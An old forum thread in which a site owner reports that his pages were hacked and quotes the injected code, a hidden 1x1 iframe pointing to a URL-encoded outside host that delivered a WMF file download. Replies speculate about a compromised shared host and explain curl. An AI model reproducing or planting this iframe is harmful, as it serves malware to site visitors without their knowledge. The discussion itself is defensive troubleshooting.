Is my website being hacked?

jimi_81

OSNN Senior Addict
Political Access
Joined
29 May 2002
Messages
820
Ok, i went to check on a site I maintain, and the page did not display, instead i was routed to download a wmf file.

the two files that the page uses to launch.. index.html, and home.php had the following lines of code at the top of each file:

Code:
<iframe src= http://%77%77%77%2E%74%72%75%73%74%34%66%72%65%65%2E%77%73?id=index12 frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>

I didnt check the file last modified date... i just made the correction without thinking.

has anyone ever heard of this happening?
what happened!
 
Where is the site hosted ? If it's a free host, it may be explainable.
 
I had the same thing happen to me. It's clearly a hack of some sort, since I'm on a paid host. I checked the "last modified" date and then my access logs, which revealed nothing out of the ordinary. I have a feeling that, since I'm on a shared host, someone else on the server was running vulnerable software (or maybe even the server itself) and just searched for every "public_html/index.html" (and probably other files like "home.php" there) it could find on the server.

Unfortunately, I wish I had some answers as to its origin. I haven't been able to find any information myself.

Melon
 
some things i have been looking at in the logs...
under browser lists, i see something called Curl. Never heard of it.

I googled Curl... what does this mean:
curl is a command line tool for transferring files with URL syntax, supporting FTP, FTPS, TFTP, HTTP, HTTPS, GOPHER, TELNET, DICT, FILE and LDAP. curl supports HTTPS certificates, HTTP POST, HTTP PUT, FTP uploading, HTTP form based upload, proxies, cookies, user+password authentication (Basic, Digest, NTLM, Negotiate, kerberos...), file transfer resume, proxy tunneling and a busload of other useful tricks.

According to the stats page, only 1 user has curl, 1 hit registered. looks odd, thats why i bring it up.

the site is hosted on ipowerweb.com.. ive reported it to them.
The url the iframe points to is a shady looking site: trust4free.ws
 
i feel sick to my stomach.
ipowerweb seems to be the problem.

i wont be renewing with them thats for sure.
what a piss off.

thanks guys, reps
 
It could just be a vulnerable install of some web based software (awstats, phpBB, etc.) on the same server as your site.

Happened to me, site was blatantly de-faced though so it was spotted straight away.
 
curl is a pretty standard utility to transfer files, I use it all the time, it is also implemented in quite a few web search robots, it can off course also be used for bad.

http://curl.haxx.se
 

Members online

No members online now.

Latest profile posts

Also Hi EP and people. I found this place again while looking through a oooollllllldddd backup. I have filled over 10TB and was looking at my collection of antiques. Any bids on the 500Mhz Win 95 fix?
Any of the SP crew still out there?
Xie wrote on Electronic Punk's profile.
Impressed you have kept this alive this long EP! So many sites have come and gone. :(

Just did some crude math and I apparently joined almost 18yrs ago, how is that possible???
hello peeps... is been some time since i last came here.
Electronic Punk wrote on Sazar's profile.
Rest in peace my friend, been trying to find you and finally did in the worst way imaginable.

Forum statistics

Threads
62,015
Messages
673,494
Members
5,621
Latest member
naeemsafi
Back